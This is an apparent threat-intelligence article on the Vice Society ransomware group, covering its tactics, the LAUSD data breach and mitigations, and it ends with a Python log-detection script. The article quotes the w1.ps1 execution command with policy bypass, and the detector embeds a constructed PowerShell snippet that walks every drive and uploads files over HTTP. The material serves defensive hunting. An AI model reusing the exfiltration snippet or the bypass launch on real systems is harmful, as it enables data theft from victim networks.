Vice Society: One of the Most Impactful Ransomware Gangs of 2022


Vice Society (also tracked as Vice Spider, DEV-0832, and Vanilla Tempest) is assessed to be a Russia-based group specializing in intrusion, data exfiltration, and extortion. Active since the summer of 2021, Vice Society sets itself apart from most ransomware operations by not following the ransomware-as-a-service (RaaS) model. Instead of developing and renting out its own payload, the group deploys modified versions of existing ransomware families sold on dark web marketplaces; it has been observed using forks of HelloKitty (also known as FiveHands) and Zeppelin in its attack chain. This distinguishes it from RaaS operations such as LockBit. While many ransomware groups have moved to randomly generated file extensions, DEV-0832 has branded its own Vice Society variant with extensions such as .v-s0ciety and .v-society. In late September 2022, DEV-0832 was also observed deploying a RedAlert ransomware variant that appends the .locked extension.

This financially motivated group sometimes skips ransomware deployment altogether and extorts victims with the threat of leaking stolen data. In 2022, Vice Society was recognized as one of the most impactful ransomware gangs, claiming more victims in the education sector than other ransomware operations such as LockBit, BlackCat, BianLian, and Hive. Researchers also found Vice Society targeting healthcare, government, manufacturing, retail, and legal services. Its victims span North America, South America, and Europe, a reach achieved with tradecraft that is technically unremarkable.

DEV-0832 gains initial access through well-known techniques: phishing, compromised credentials, exploitation of known vulnerabilities, or access purchased from initial access brokers. Once inside, Vice Society runs automated scripts and abuses the organization's own network management tools for reconnaissance and data collection, then deploys the prepackaged ransomware. The group has also been observed using PowerShell Empire, SystemBC, and Cobalt Strike for lateral movement. Based on incident response engagements in 2021, Vice Society typically dwells in a victim environment for around six days. Initial ransom demands can exceed $1 million, but negotiations often bring the figure down by about 60%, to roughly $460,000. Vice Society takes extensive steps to prevent recovery without payment: in one observed intrusion, DEV-0832 compromised two domain administrator accounts and reset the passwords of over 150,000 users, locking out legitimate users and hampering remediation, including attempts to stop the ransomware deployment or conduct post-compromise incident response.

In early 2023, the Los Angeles Unified School District (LAUSD), the second-largest school district in the United States, disclosed that the Vice Society attack on the district had resulted in the theft of files containing the personal information of contractors, including Social Security Numbers (SSNs). LAUSD determined that the threat actors had access to its network for more than a month, from July 31, 2022, to September 3, 2022. The stolen data included payroll records and labor-related documents containing the SSNs, names, and home addresses of contractor and subcontractor employees, and LAUSD confirmed that Vice Society had published the data on its leak site. LAUSD refused to pay the ransom, choosing to direct its resources toward students' education. The FBI, CISA, and MS-ISAC issued a joint advisory warning of Vice Society's disproportionate targeting of the U.S. education sector. Vice Society has also claimed attacks on other educational institutions globally, including Cincinnati State Technical and Community College and the University of Duisburg-Essen. LAUSD serves over 640,000 kindergarten through 12th-grade students across Los Angeles and surrounding areas.

Most recently, researchers found that Vice Society used a custom PowerShell script to exfiltrate data from a victim network. Because PowerShell is already present on every Windows host, a living-off-the-land script of this kind avoids dropping a separate exfiltration tool that security software might flag. The script, named w1.ps1, was recovered from the Windows Event Log and had been launched with the command "powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1". Note what that command line reveals: the execution policy is bypassed, and the script is loaded from a hidden administrative share (s$) on another host in the network rather than from local disk, so process-creation telemetry showing PowerShell running a script from a UNC path is a strong hunting signal on its own. The script takes no arguments and chooses what to steal by itself: it enumerates the mounted drives, recursively walks each root directory, and uploads the selected files over HTTP. Selection is filtered both ways: exclusion rules skip system files, backups, web-browser folders, and the directories of certain security products, while inclusion rules keep only files larger than 10 KB with specific extensions in designated directories, which also keeps the script's resource consumption low. The script reflects a high level of coding skill and underlines that double extortion, not just encryption, is the persistent threat in ransomware incidents and that defenders need to stay alert to such techniques.

To mitigate the impact of Vice Society, consider implementing the following measures: 

  • Conduct device discovery to increase network visibility and find unmanaged hosts. 
  • Use vulnerability management tooling to keep systems patched against the known vulnerabilities the group exploits for access. 
  • Deploy firewalls and intrusion prevention devices. 
  • Enable cloud-delivered protection in your antivirus solution. 
  • Turn on tamper protection so an attacker with administrative rights cannot disable endpoint security. 
  • Run endpoint detection and response in block mode. 
  • Enable automated investigation and remediation. 
  • Enforce strong credential hygiene, including protecting and monitoring domain administrator accounts. 
  • Apply attack surface reduction rules to block common infection vectors. 
  • Enable PowerShell module logging and script block logging; script block logging is what lets a script such as w1.ps1 be recovered from the event log after the fact. 

Additionally, monitor process-creation and PowerShell logs for the command line shown above, and more generally for powershell.exe launched with -ExecutionPolicy Bypass against a script on a UNC path. Together these measures will strengthen your defenses and reduce the impact of this threat.
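The w1.ps1 execution command quoted earlier and the monitoring recommendation above both reduce to two detections: PowerShell started with a script on a UNC (typically hidden admin) share, and script block content that walks every drive and uploads files over HTTP. The following Python is an added example written for this page, not code from the original post or from any vendor: it runs both checks over constructed sample events. The event dicts, the sample script block, the address 192.0.2.10 and the rule names are all assumptions made up for the demonstration; the sample script block is not the real w1.ps1, only a stand-in with the traits the text describes.

```python
"""Detect w1.ps1-style tradecraft: PowerShell run against a script on a remote
admin share (Security 4688) and script blocks that walk every drive and POST
files (PowerShell 4104). Constructed example; events are synthetic."""
import re
from typing import Optional

# Constructed stand-in for an exfiltration script block captured by script
# block logging. NOT the real w1.ps1, only the traits the text describes:
# drive enumeration, recursive walk, size floor, extension allowlist,
# path exclusions, HTTP upload.
EXFIL_LIKE_SCRIPT = r'''
$drives = Get-WmiObject Win32_LogicalDisk | Select-Object -ExpandProperty DeviceID
foreach ($d in $drives) {
  Get-ChildItem -Path "$d\" -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 10240 -and $_.Extension -in $exts -and
                   $_.FullName -notmatch 'Windows|Backup|Chrome' } |
    ForEach-Object { Invoke-WebRequest -Uri $u -Method POST -InFile $_.FullName }
}
'''

# Constructed events; field names follow Security 4688 (CommandLine) and
# PowerShell 4104 (ScriptBlockText). 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -file \\192.0.2.10\s$\w1.ps1"},
    {"EventID": 4688, "CommandLine": r"powershell.exe -NoProfile -File C:\ProgramData\Scripts\nightly-backup.ps1"},
    {"EventID": 4688, "CommandLine": r"powershell.exe -ep bypass -f \\192.0.2.10\c$\Temp\run.ps1"},
    {"EventID": 4104, "ScriptBlockText": EXFIL_LIKE_SCRIPT},
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem C:\inetpub\logs -Recurse | Where-Object { $_.Length -gt 10MB } | Remove-Item"},
]

# Rule 1 (4688): PowerShell given a script file on a UNC path, worse with policy bypass.
_PS_EXE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)
_BYPASS = re.compile(r"-e(?:p|x(?:ecutionpolicy|ec)?)\s+bypass", re.I)      # -ep/-ex/-exec/-ExecutionPolicy
_FILE_ARG = re.compile(r"-f(?:ile)?\s+\"?([^\s\"]+)", re.I)                 # -f / -file <path>
_ADMIN_SHARE = re.compile(r"^\\\\[^\\\s]+\\(?:[a-z]\$|admin\$)(?:\\|$)", re.I)  # \\host\c$\..., \\host\s$\...

def check_process_creation(cmdline: str) -> Optional[dict]:
    """Return an alert dict for PowerShell loading a script over SMB, else None."""
    if not _PS_EXE.search(cmdline):
        return None
    m = _FILE_ARG.search(cmdline)
    if not m or not m.group(1).startswith("\\\\"):
        return None                      # local script paths are routine admin work
    script = m.group(1)
    bypass = bool(_BYPASS.search(cmdline))
    return {
        "rule": "ps_script_from_unc",
        "script": script,
        "bypass": bypass,
        "admin_share": bool(_ADMIN_SHARE.match(script)),
        "severity": "high" if bypass else "medium",
    }

# Rule 2 (4104): script content that selects files across all drives and uploads them.
TRAITS = {
    "drive_enum": re.compile(r"Get-PSDrive|Win32_LogicalDisk|DriveInfo\]::GetDrives", re.I),
    "recursive_listing": re.compile(r"(?:Get-ChildItem|\bgci\b)[^\n|]*-Recurse", re.I),
    "size_floor": re.compile(r"\.Length\s+-gt\s+\d+", re.I),
    "extension_filter": re.compile(r"\.Extension\s+-(?:in|eq|match|like|notin)", re.I),
    "path_exclusion": re.compile(r"-not(?:match|like)\s+['\"][^'\"]*(?:Windows|Backup|Chrome|Firefox|Edge)", re.I),
    "http_upload": re.compile(r"Invoke-(?:WebRequest|RestMethod)[^\n]*-(?:Method\s+POST|InFile)|\.UploadFile\(", re.I),
}

def check_script_block(text: str) -> Optional[dict]:
    """Alert when the upload primitive co-occurs with at least two selection traits."""
    hits = [name for name, rx in TRAITS.items() if rx.search(text)]
    # Listing or size-filtering files alone is routine; listing plus HTTP upload is not.
    if "http_upload" in hits and len(hits) >= 3:
        return {"rule": "ps_bulk_file_upload", "traits": hits, "severity": "high"}
    return None

def scan_events(events) -> list:
    """Run both rules over a list of event dicts and return the alerts in order."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 4688:
            alert = check_process_creation(ev.get("CommandLine", ""))
        elif ev.get("EventID") == 4104:
            alert = check_script_block(ev.get("ScriptBlockText", ""))
        else:
            alert = None
        if alert:
            alerts.append(alert)
    return alerts

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(a)
```

Feed it the CommandLine of Security 4688 events (or Sysmon Event ID 1) and the ScriptBlockText of PowerShell 4104 events exported from your SIEM. The script block rule deliberately requires the upload primitive plus two selection traits, so ordinary housekeeping scripts that merely recurse and size-filter, like the log-cleanup sample, do not alert; the process rule fires on any script loaded from a UNC path and raises severity when the execution policy is bypassed as in the w1.ps1 command line.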